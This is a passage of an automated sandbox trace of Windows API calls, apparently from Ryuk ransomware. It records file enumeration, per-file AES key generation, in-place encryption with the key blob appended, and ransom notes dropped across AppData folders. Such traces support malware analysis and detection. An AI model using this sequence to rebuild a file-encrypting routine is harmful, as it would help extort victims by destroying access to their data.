lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Apps\\2.0\\DQQ19BCJ.JAX\\YVORLGOR.PNT\\manifests\\*.*", lpFindFileData=0x29aa420 | out: lpFindFileData=0x29aa420) returned 0x3a3000 [0141.272] FindNextFileW (in: hFindFile=0x3a3000, lpFindFileData=0x29aa420 | out: lpFindFileData=0x29aa420) returned 1 [0141.272] FindNextFileW (in: hFindFile=0x3a3000, lpFindFileData=0x29aa420 | out: lpFindFileData=0x29aa420) returned 1 [0141.272] FindNextFileW (in: hFindFile=0x3a3000, lpFindFileData=0x29aa420 | out: lpFindFileData=0x29aa420) returned 1 [0141.272] FindNextFileW (in: hFindFile=0x3a3000, lpFindFileData=0x29aa420 | out: lpFindFileData=0x29aa420) returned 1 [0141.272] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0141.272] SetFileAttributesW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Apps\\2.0\\DQQ19BCJ.JAX\\YVORLGOR.PNT\\manifests\\goog...app_baa8013a79450f71_0001.0003_none_677c9e37069a7e2a.cdf-ms", dwFileAttributes=0x80) returned 1 [0141.273] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Apps\\2.0\\DQQ19BCJ.JAX\\YVORLGOR.PNT\\manifests\\goog...app_baa8013a79450f71_0001.0003_none_677c9e37069a7e2a.cdf-ms" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\apps\\2.0\\dqq19bcj.jax\\yvorlgor.pnt\\manifests\\goog...app_baa8013a79450f71_0001.0003_none_677c9e37069a7e2a.cdf-ms"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1a0 [0141.273] GetFileSizeEx (in: hFile=0x1a0, lpFileSize=0x29aa1c8 | out: lpFileSize=0x29aa1c8*=14512) returned 1 [0141.273] GetFileSizeEx (in: hFile=0x1a0, lpFileSize=0x29aa1d8 | out: lpFileSize=0x29aa1d8*=14512) returned 1 [0141.273] SetFilePointerEx (in: hFile=0x1a0, liDistanceToMove=0x378e, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0141.273] ReadFile (in: hFile=0x1a0, lpBuffer=0x29aa228, nNumberOfBytesToRead=0x19, lpNumberOfBytesRead=0x29aa1e8, lpOverlapped=0x0 | out: lpBuffer=0x29aa228*, lpNumberOfBytesRead=0x29aa1e8*=0x19, lpOverlapped=0x0) returned 1 [0141.275] SetFilePointer (in: hFile=0x1a0, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0141.275] CryptGenKey (in: hProv=0x3add40, Algid=0x6610, dwFlags=0x1, phKey=0x29aa1b0 | out: phKey=0x29aa1b0*=0x3b8690) returned 1 [0141.275] VirtualAlloc (lpAddress=0x0, dwSize=0xf429a, flAllocationType=0x1000, flProtect=0x4) returned 0x2760000 [0141.275] SetFilePointer (in: hFile=0x1a0, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0141.275] ReadFile (in: hFile=0x1a0, lpBuffer=0x2760000, nNumberOfBytesToRead=0x38b0, lpNumberOfBytesRead=0x29aa1c0, lpOverlapped=0x0 | out: lpBuffer=0x2760000*, lpNumberOfBytesRead=0x29aa1c0*=0x38b0, lpOverlapped=0x0) returned 1 [0141.275] CryptEncrypt (in: hKey=0x3b8690, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x29aa1bc*=0xf4240, dwBufLen=0x0 | out: pbData=0x0*, pdwDataLen=0x29aa1bc*=0xf4250) returned 1 [0141.276] CryptEncrypt (in: hKey=0x3b8690, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x2760000*, pdwDataLen=0x29aa1b8*=0x38b0, dwBufLen=0xf4250 | out: pbData=0x2760000*, pdwDataLen=0x29aa1b8*=0x38c0) returned 1 [0141.276] SetFilePointer (in: hFile=0x1a0, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0141.276] WriteFile (in: hFile=0x1a0, lpBuffer=0x2760000*, nNumberOfBytesToWrite=0x38c0, lpNumberOfBytesWritten=0x29aa1c0, lpOverlapped=0x0 | out: lpBuffer=0x2760000*, lpNumberOfBytesWritten=0x29aa1c0*=0x38c0, lpOverlapped=0x0) returned 1 [0141.276] WriteFile (in: hFile=0x1a0, lpBuffer=0x29aa200*, nNumberOfBytesToWrite=0x6, lpNumberOfBytesWritten=0x29aa1c4, lpOverlapped=0x0 | out: lpBuffer=0x29aa200*, lpNumberOfBytesWritten=0x29aa1c4*=0x6, lpOverlapped=0x0) returned 1 [0141.276] CryptExportKey (in: hKey=0x3b8690, hExpKey=0x3b8620, dwBlobType=0x1, dwFlags=0x0, pbData=0x0, pdwDataLen=0x29aa1d0 | out: pbData=0x0*, pdwDataLen=0x29aa1d0*=0x10c) returned 1 [0141.276] CryptExportKey (in: hKey=0x3b8690, hExpKey=0x3b8620, dwBlobType=0x1, dwFlags=0x0, pbData=0x29aa250, pdwDataLen=0x29aa1d0 | out: pbData=0x29aa250*, pdwDataLen=0x29aa1d0*=0x10c) returned 1 [0141.276] WriteFile (in: hFile=0x1a0, lpBuffer=0x29aa250*, nNumberOfBytesToWrite=0x10c, lpNumberOfBytesWritten=0x29aa1c4, lpOverlapped=0x0 | out: lpBuffer=0x29aa250*, lpNumberOfBytesWritten=0x29aa1c4*=0x10c, lpOverlapped=0x0) returned 1 [0141.276] CloseHandle (hObject=0x1a0) returned 1 [0141.292] VirtualFree (lpAddress=0x2760000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0141.296] CryptDestroyKey (hKey=0x3b8690) returned 1 [0141.296] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0141.296] FindNextFileW (in: hFindFile=0x3a3000, lpFindFileData=0x29aa420 | out: lpFindFileData=0x29aa420) returned 1 [0141.296] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0141.296] SetFileAttributesW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Apps\\2.0\\DQQ19BCJ.JAX\\YVORLGOR.PNT\\manifests\\goog...app_baa8013a79450f71_0001.0003_none_677c9e37069a7e2a.manifest", dwFileAttributes=0x80) returned 1 [0141.297] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Apps\\2.0\\DQQ19BCJ.JAX\\YVORLGOR.PNT\\manifests\\goog...app_baa8013a79450f71_0001.0003_none_677c9e37069a7e2a.manifest" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\apps\\2.0\\dqq19bcj.jax\\yvorlgor.pnt\\manifests\\goog...app_baa8013a79450f71_0001.0003_none_677c9e37069a7e2a.manifest"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1a0 [0141.297] GetFileSizeEx (in: hFile=0x1a0, lpFileSize=0x29aa1c8 | out: lpFileSize=0x29aa1c8*=11824) returned 1 [0141.297] GetFileSizeEx (in: hFile=0x1a0, lpFileSize=0x29aa1d8 | out: lpFileSize=0x29aa1d8*=11824) returned 1 [0141.297] SetFilePointerEx (in: hFile=0x1a0, liDistanceToMove=0x2d0e, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0141.297] ReadFile (in: hFile=0x1a0, lpBuffer=0x29aa228, nNumberOfBytesToRead=0x19, lpNumberOfBytesRead=0x29aa1e8, lpOverlapped=0x0 | out: lpBuffer=0x29aa228*, lpNumberOfBytesRead=0x29aa1e8*=0x19, lpOverlapped=0x0) returned 1 [0141.298] SetFilePointer (in: hFile=0x1a0, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0141.298] CryptGenKey (in: hProv=0x3add40, Algid=0x6610, dwFlags=0x1, phKey=0x29aa1b0 | out: phKey=0x29aa1b0*=0x3b8690) returned 1 [0141.298] VirtualAlloc (lpAddress=0x0, dwSize=0xf429a, flAllocationType=0x1000, flProtect=0x4) returned 0x2760000 [0141.298] SetFilePointer (in: hFile=0x1a0, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0141.298] ReadFile (in: hFile=0x1a0, lpBuffer=0x2760000, nNumberOfBytesToRead=0x2e30, lpNumberOfBytesRead=0x29aa1c0, lpOverlapped=0x0 | out: lpBuffer=0x2760000*, lpNumberOfBytesRead=0x29aa1c0*=0x2e30, lpOverlapped=0x0) returned 1 [0141.299] CryptEncrypt (in: hKey=0x3b8690, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x29aa1bc*=0xf4240, dwBufLen=0x0 | out: pbData=0x0*, pdwDataLen=0x29aa1bc*=0xf4250) returned 1 [0141.299] CryptEncrypt (in: hKey=0x3b8690, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x2760000*, pdwDataLen=0x29aa1b8*=0x2e30, dwBufLen=0xf4250 | out: pbData=0x2760000*, pdwDataLen=0x29aa1b8*=0x2e40) returned 1 [0141.299] SetFilePointer (in: hFile=0x1a0, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0141.299] WriteFile (in: hFile=0x1a0, lpBuffer=0x2760000*, nNumberOfBytesToWrite=0x2e40, lpNumberOfBytesWritten=0x29aa1c0, lpOverlapped=0x0 | out: lpBuffer=0x2760000*, lpNumberOfBytesWritten=0x29aa1c0*=0x2e40, lpOverlapped=0x0) returned 1 [0141.299] WriteFile (in: hFile=0x1a0, lpBuffer=0x29aa200*, nNumberOfBytesToWrite=0x6, lpNumberOfBytesWritten=0x29aa1c4, lpOverlapped=0x0 | out: lpBuffer=0x29aa200*, lpNumberOfBytesWritten=0x29aa1c4*=0x6, lpOverlapped=0x0) returned 1 [0141.299] CryptExportKey (in: hKey=0x3b8690, hExpKey=0x3b8620, dwBlobType=0x1, dwFlags=0x0, pbData=0x0, pdwDataLen=0x29aa1d0 | out: pbData=0x0*, pdwDataLen=0x29aa1d0*=0x10c) returned 1 [0141.299] CryptExportKey (in: hKey=0x3b8690, hExpKey=0x3b8620, dwBlobType=0x1, dwFlags=0x0, pbData=0x29aa250, pdwDataLen=0x29aa1d0 | out: pbData=0x29aa250*, pdwDataLen=0x29aa1d0*=0x10c) returned 1 [0141.299] WriteFile (in: hFile=0x1a0, lpBuffer=0x29aa250*, nNumberOfBytesToWrite=0x10c, lpNumberOfBytesWritten=0x29aa1c4, lpOverlapped=0x0 | out: lpBuffer=0x29aa250*, lpNumberOfBytesWritten=0x29aa1c4*=0x10c, lpOverlapped=0x0) returned 1 [0141.299] CloseHandle (hObject=0x1a0) returned 1 [0141.317] VirtualFree (lpAddress=0x2760000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0141.322] CryptDestroyKey (hKey=0x3b8690) returned 1 [0141.322] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0141.322] FindNextFileW (in: hFindFile=0x3a3000, lpFindFileData=0x29aa420 | out: lpFindFileData=0x29aa420) returned 0 [0141.322] FindClose (in: hFindFile=0x3a3000 | out: hFindFile=0x3a3000) returned 1 [0141.322] SetLastError (dwErrCode=0x0) [0141.322] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Apps\\2.0\\DQQ19BCJ.JAX\\YVORLGOR.PNT\\manifests\\RyukReadMe.txt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\apps\\2.0\\dqq19bcj.jax\\yvorlgor.pnt\\manifests\\ryukreadme.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x19c [0141.322] GetLastError () returned 0x0 [0141.322] WriteFile (in: hFile=0x19c, lpBuffer=0x13f108500*, nNumberOfBytesToWrite=0x320, lpNumberOfBytesWritten=0x29aab80, lpOverlapped=0x0 | out: lpBuffer=0x13f108500*, lpNumberOfBytesWritten=0x29aab80*=0x320, lpOverlapped=0x0) returned 1 [0141.323] CloseHandle (hObject=0x19c) returned 1 [0141.323] FindNextFileW (in: hFindFile=0x3a2fa0, lpFindFileData=0x29aabd0 | out: lpFindFileData=0x29aabd0) returned 0 [0141.323] FindClose (in: hFindFile=0x3a2fa0 | out: hFindFile=0x3a2fa0) returned 1 [0141.323] SetLastError (dwErrCode=0x0) [0141.323] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Apps\\2.0\\DQQ19BCJ.JAX\\YVORLGOR.PNT\\RyukReadMe.txt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\apps\\2.0\\dqq19bcj.jax\\yvorlgor.pnt\\ryukreadme.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x198 [0141.323] GetLastError () returned 0xb7 [0141.323] CloseHandle (hObject=0x198) returned 1 [0141.323] FindNextFileW (in: hFindFile=0x3a2f40, lpFindFileData=0x29ab380 | out: lpFindFileData=0x29ab380) returned 0 [0141.323] FindClose (in: hFindFile=0x3a2f40 | out: hFindFile=0x3a2f40) returned 1 [0141.323] SetLastError (dwErrCode=0x0) [0141.324] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Apps\\2.0\\DQQ19BCJ.JAX\\RyukReadMe.txt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\apps\\2.0\\dqq19bcj.jax\\ryukreadme.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x194 [0141.324] GetLastError () returned 0xb7 [0141.324] CloseHandle (hObject=0x194) returned 1 [0141.324] FindNextFileW (in: hFindFile=0x3a2ee0, lpFindFileData=0x29abb30 | out: lpFindFileData=0x29abb30) returned 0 [0141.324] FindClose (in: hFindFile=0x3a2ee0 | out: hFindFile=0x3a2ee0) returned 1 [0141.324] SetLastError (dwErrCode=0x0) [0141.324] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Apps\\2.0\\RyukReadMe.txt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\apps\\2.0\\ryukreadme.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x190 [0141.324] GetLastError () returned 0xb7 [0141.324] CloseHandle (hObject=0x190) returned 1 [0141.324] FindNextFileW (in: hFindFile=0x3a2e80, lpFindFileData=0x29ac2e0 | out: lpFindFileData=0x29ac2e0) returned 0 [0141.324] FindClose (in: hFindFile=0x3a2e80 | out: hFindFile=0x3a2e80) returned 1 [0141.324] SetLastError (dwErrCode=0x0) [0141.324] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Apps\\RyukReadMe.txt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\apps\\ryukreadme.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x18c [0141.324] GetLastError () returned 0xb7 [0141.324] CloseHandle (hObject=0x18c) returned 1 [0141.324] FindNextFileW (in: hFindFile=0x3a2e20, lpFindFileData=0x29aca90 | out: lpFindFileData=0x29aca90) returned 1 [0141.324] SetLastError (dwErrCode=0x0) [0141.324] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\RyukReadMe.txt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\ryukreadme.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x18c [0141.324] GetLastError () returned 0xb7 [0141.324] CloseHandle (hObject=0x18c) returned 1 [0141.325] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Deployment\\*.*", lpFindFileData=0x29ac2e0 | out: lpFindFileData=0x29ac2e0) returned 0x3a2e80 [0141.325] FindNextFileW (in: hFindFile=0x3a2e80, lpFindFileData=0x29ac2e0 | out: lpFindFileData=0x29ac2e0) returned 1 [0141.325] FindNextFileW (in: hFindFile=0x3a2e80, lpFindFileData=0x29ac2e0 | out: lpFindFileData=0x29ac2e0) returned 0 [0141.325] FindClose (in: hFindFile=0x3a2e80 | out: hFindFile=0x3a2e80) returned 1 [0141.325] SetLastError (dwErrCode=0x0) [0141.325] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Deployment\\RyukReadMe.txt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\deployment\\ryukreadme.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x18c [0141.326] GetLastError () returned 0x0 [0141.326] WriteFile (in: hFile=0x18c, lpBuffer=0x13f108500*, nNumberOfBytesToWrite=0x320, lpNumberOfBytesWritten=0x29aca40, lpOverlapped=0x0 | out: lpBuffer=0x13f108500*, lpNumberOfBytesWritten=0x29aca40*=0x320, lpOverlapped=0x0) returned 1 [0141.327] CloseHandle (hObject=0x18c) returned 1 [0141.327] FindNextFileW (in: hFindFile=0x3a2e20, lpFindFileData=0x29aca90 | out: lpFindFileData=0x29aca90) returned 1 [0141.327] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0141.327] SetFileAttributesW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\GDIPFONTCACHEV1.DAT", dwFileAttributes=0x80) returned 1 [0141.327] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\GDIPFONTCACHEV1.DAT" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\gdipfontcachev1.dat"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x18c [0141.327] GetFileSizeEx (in: hFile=0x18c, lpFileSize=0x29ac838 | out: lpFileSize=0x29ac838*=108824) returned 1 [0141.327] GetFileSizeEx (in: hFile=0x18c, lpFileSize=0x29ac848 | out: lpFileSize=0x29ac848*=108824) returned 1 [0141.327] SetFilePointerEx (in: hFile=0x18c, liDistanceToMove=0x1a7f6, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0141.327] ReadFile (in: hFile=0x18c, lpBuffer=0x29ac898, nNumberOfBytesToRead=0x19, lpNumberOfBytesRead=0x29ac858, lpOverlapped=0x0 | out: lpBuffer=0x29ac898*, lpNumberOfBytesRead=0x29ac858*=0x19, lpOverlapped=0x0) returned 1 [0141.329] SetFilePointer (in: hFile=0x18c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0141.329] CryptGenKey (in: hProv=0x3add40, Algid=0x6610, dwFlags=0x1, phKey=0x29ac820 | out: phKey=0x29ac820*=0x3b8690) returned 1 [0141.329] VirtualAlloc (lpAddress=0x0, dwSize=0xf429a, flAllocationType=0x1000, flProtect=0x4) returned 0x2760000 [0141.329] SetFilePointer (in: hFile=0x18c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0141.329] ReadFile (in: hFile=0x18c, lpBuffer=0x2760000, nNumberOfBytesToRead=0x1a918, lpNumberOfBytesRead=0x29ac830, lpOverlapped=0x0 | out: lpBuffer=0x2760000*, lpNumberOfBytesRead=0x29ac830*=0x1a918, lpOverlapped=0x0) returned 1 [0141.331] CryptEncrypt (in: hKey=0x3b8690, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x29ac82c*=0xf4240, dwBufLen=0x0 | out: pbData=0x0*, pdwDataLen=0x29ac82c*=0xf4250) returned 1 [0141.331] CryptEncrypt (in: hKey=0x3b8690, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x2760000*, pdwDataLen=0x29ac828*=0x1a918, dwBufLen=0xf4250 | out: pbData=0x2760000*, pdwDataLen=0x29ac828*=0x1a920) returned 1 [0141.331] SetFilePointer (in: hFile=0x18c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0141.331] WriteFile (in: hFile=0x18c, lpBuffer=0x2760000*, nNumberOfBytesToWrite=0x1a920, lpNumberOfBytesWritten=0x29ac830, lpOverlapped=0x0 | out: lpBuffer=0x2760000*, lpNumberOfBytesWritten=0x29ac830*=0x1a920, lpOverlapped=0x0) returned 1 [0141.332] WriteFile (in: hFile=0x18c, lpBuffer=0x29ac870*, nNumberOfBytesToWrite=0x6, lpNumberOfBytesWritten=0x29ac834, lpOverlapped=0x0 | out: lpBuffer=0x29ac870*, lpNumberOfBytesWritten=0x29ac834*=0x6, lpOverlapped=0x0) returned 1 [0141.332] CryptExportKey (in: hKey=0x3b8690, hExpKey=0x3b8620, dwBlobType=0x1, dwFlags=0x0, pbData=0x0, pdwDataLen=0x29ac840 | out: pbData=0x0*, pdwDataLen=0x29ac840*=0x10c) returned 1 [0141.332] CryptExportKey (in: hKey=0x3b8690, hExpKey=0x3b8620, dwBlobType=0x1, dwFlags=0x0, pbData=0x29ac8c0, pdwDataLen=0x29ac840 | out: pbData=0x29ac8c0*, pdwDataLen=0x29ac840*=0x10c) returned 1 [0141.332] WriteFile (in: hFile=0x18c, lpBuffer=0x29ac8c0*, nNumberOfBytesToWrite=0x10c, lpNumberOfBytesWritten=0x29ac834, lpOverlapped=0x0 | out: lpBuffer=0x29ac8c0*, lpNumberOfBytesWritten=0x29ac834*=0x10c, lpOverlapped=0x0) returned 1 [0141.332] CloseHandle (hObject=0x18c) returned 1 [0141.357] VirtualFree (lpAddress=0x2760000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0141.361] CryptDestroyKey (hKey=0x3b8690) returned 1 [0141.361] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0141.361] FindNextFileW (in: hFindFile=0x3a2e20, lpFindFileData=0x29aca90 | out: lpFindFileData=0x29aca90) returned 1 [0141.361] SetLastError (dwErrCode=0x0) [0141.361] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\RyukReadMe.txt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\ryukreadme.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x18c [0141.361] GetLastError () returned 0xb7 [0141.361] CloseHandle (hObject=0x18c) returned 1 [0141.361] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\*.*", lpFindFileData=0x29ac2e0 | out: lpFindFileData=0x29ac2e0) returned 0x3a2e80 [0141.361] FindNextFileW (in: hFindFile=0x3a2e80, lpFindFileData=0x29ac2e0 | out: lpFindFileData=0x29ac2e0) returned 1 [0141.362] FindNextFileW (in: hFindFile=0x3a2e80, lpFindFileData=0x29ac2e0 | out: lpFindFileData=0x29ac2e0) returned 1 [0141.362] FindNextFileW (in: hFindFile=0x3a2e80, lpFindFileData=0x29ac2e0 | out: lpFindFileData=0x29ac2e0) returned 1 [0141.362] SetLastError (dwErrCode=0x0) [0141.362] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\RyukReadMe.txt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\ryukreadme.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x190 [0141.362] GetLastError () returned 0x0 [0141.362] WriteFile (in: hFile=0x190, lpBuffer=0x13f108500*, nNumberOfBytesToWrite=0x320, lpNumberOfBytesWritten=0x29ac290, lpOverlapped=0x0 | out: lpBuffer=0x13f108500*, lpNumberOfBytesWritten=0x29ac290*=0x320, lpOverlapped=0x0) returned 1 [0141.363] CloseHandle (hObject=0x190) returned 1 [0141.363] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\CrashReports\\*.*", lpFindFileData=0x29abb30 | out: lpFindFileData=0x29abb30) returned 0x3a2ee0 [0141.363] FindNextFileW (in: hFindFile=0x3a2ee0, lpFindFileData=0x29abb30 | out: lpFindFileData=0x29abb30) returned 1 [0141.363] FindNextFileW (in: hFindFile=0x3a2ee0, lpFindFileData=0x29abb30 | out: lpFindFileData=0x29abb30) returned 0 [0141.363] FindClose (in: hFindFile=0x3a2ee0 | out: hFindFile=0x3a2ee0) returned 1 [0141.363] SetLastError (dwErrCode=0x0) [0141.363] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\CrashReports\\RyukReadMe.txt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\crashreports\\ryukreadme.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x190 [0141.367] GetLastError () returned 0x0 [0141.367] WriteFile (in: hFile=0x190, lpBuffer=0x13f108500*, nNumberOfBytesToWrite=0x320, lpNumberOfBytesWritten=0x29ac290, lpOverlapped=0x0 | out: lpBuffer=0x13f108500*, lpNumberOfBytesWritten=0x29ac290*=0x320, lpOverlapped=0x0) returned 1 [0141.367] CloseHandle (hObject=0x190) returned 1 [0141.367] FindNextFileW (in: hFindFile=0x3a2e80, lpFindFileData=0x29ac2e0 | out: lpFindFileData=0x29ac2e0) returned 0 [0141.367] FindClose (in: hFindFile=0x3a2e80 | out: hFindFile=0x3a2e80) returned 1 [0141.368] SetLastError (dwErrCode=0x0) [0141.368] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\RyukReadMe.txt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\ryukreadme.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x18c [0141.368] GetLastError () returned 0xb7 [0141.368] CloseHandle (hObject=0x18c) returned 1 [0141.368] FindNextFileW (in: hFindFile=0x3a2e20, lpFindFileData=0x29aca90 | out: lpFindFileData=0x29aca90) returned 1 [0141.368] SetLastError (dwErrCode=0x0) [0141.368] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\RyukReadMe.txt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\ryukreadme.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x18c [0141.368] GetLastError () returned 0xb7 [0141.368] CloseHandle (hObject=0x18c) returned 1 [0141.368] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\History\\*.*", lpFindFileData=0x29ac2e0 | out: lpFindFileData=0x29ac2e0) returned 0xffffffffffffffff [0141.368] FindClose (in: hFindFile=0xffffffffffffffff | out: hFindFile=0xffffffffffffffff) returned 0 [0141.368] SetLastError (dwErrCode=0x0) [0141.368] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\History\\RyukReadMe.txt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\history\\ryukreadme.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x18c [0141.368] GetLastError () returned 0x0 [0141.368] WriteFile (in: hFile=0x18c, 